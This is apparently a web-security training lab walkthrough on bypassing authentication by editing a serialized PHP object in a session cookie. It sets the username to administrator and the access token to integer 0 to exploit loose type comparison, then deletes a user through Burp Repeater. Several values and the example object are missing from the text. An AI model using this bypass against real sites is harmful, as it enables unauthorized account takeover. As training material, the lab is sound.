Lab: Modifying serialized data types
This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the
administrator account. Then, delete Carlos.
You can log in to your own account using the following credentials:
To access another user's account, you will need to exploit a quirk in how PHP compares data of different types.
- Log in using your own credentials. URL-decode and Base64-decode the session cookie to reveal a serialized PHP object.
Change the username to
administratorand update the length of the attribute to
Change the access token to the integer
0. Remember to update the data type label by replacing
i. The modified object should look like this:
- Base64 and URL-encode the object. Copy the URL-encoded string to your clipboard.
In Burp Repeater, use your modified session cookie to access the
administratoraccount and delete Carlos.